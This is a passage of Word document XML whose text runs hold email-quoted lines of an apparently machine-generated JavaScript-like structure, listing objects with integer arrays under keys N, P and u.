    <w:p w14:paraId="0F3D00A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324DF276" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 2, 0, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B67C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A8AE4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2633D9F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D2388" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A88F397" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F5EA3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27B55E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1165D28F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B71A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B539B8A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 15, 22, 32, 35, 197]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2182B362" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E287D8F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6265B150" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72502626" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D462B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DBB0F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C20CD31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CCC83" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE6CDF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D37216" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [26, 7, 25, 15, 20, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CCB659" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 27, 28, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507C2DA7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22, 56, 91, 124, 128, 138, 143, 159, 175, 245, 311, 317, 329, 335, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F037C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898E4E0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C912A75" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1816B67A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63366B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B8762" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 11,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF56C48" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2547CA0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1ED133" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 4, 5, 6, 7, 8, 9, 10, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C7D21" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 280]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0469082D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6B47C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD047E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 4, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A922AE4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048453DC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34, 44, 94, 257, 323]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6391C908" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADA14E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [10, 8, 11, 9, 18, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6058A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34DE3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 12, 47, 66, 69, 104, 135, 158, 159, 160, 191, 224, 252, 269, 311, 316, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693EF4D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43FA21" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDFA0E6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672C7A62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305FF1D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCDC90D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A6F2E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC17970" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C7848" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 10, 13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F3DA4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166CB477" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635404AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944840B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A6500" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C518406" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E42978C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 4, 5, 6, 8, 9, 10, 11, 12, 13, 14, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCA6A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 7, 15, 21, 31, 33, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F51675A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F69AA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F97998F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EAF92F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 11, 15, 16, 19, 21, 23, 24, 25, 27, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266720B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F31CE0A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA1865" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0246AE77" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FC18D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D13283" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8BB8E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E419D01" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663131D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850DB8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21033B50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14074169" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75650859" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE28CE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14704506" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214B705" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBE0B5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6D2BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F8257" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028809BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 27]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA7219" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38280C24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73669080" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C26D05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDD2FA8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A2DE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3ECF4E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A3B083" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 16, 19, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB76EE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212566B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E12336" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0210AE14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 9, 21, 159]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2F87A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833378B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE68419" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39667A31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13, 16, 20, 159, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6A6BBD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB40582" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11440985" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2DFD1E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [44]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515464E1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAEE4AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2987B1FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C41B63" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 18, 19, 27]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B950E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57723019" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC0C24" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5AB1D9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [206]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B659379" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D740ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2B83D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2C477" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 4, 13, 14]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F7EDEF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FC876" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A1A27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A285A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276AEAE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC24A1A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A1AB66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10394DBC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167EB82" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC29546" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E55700" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
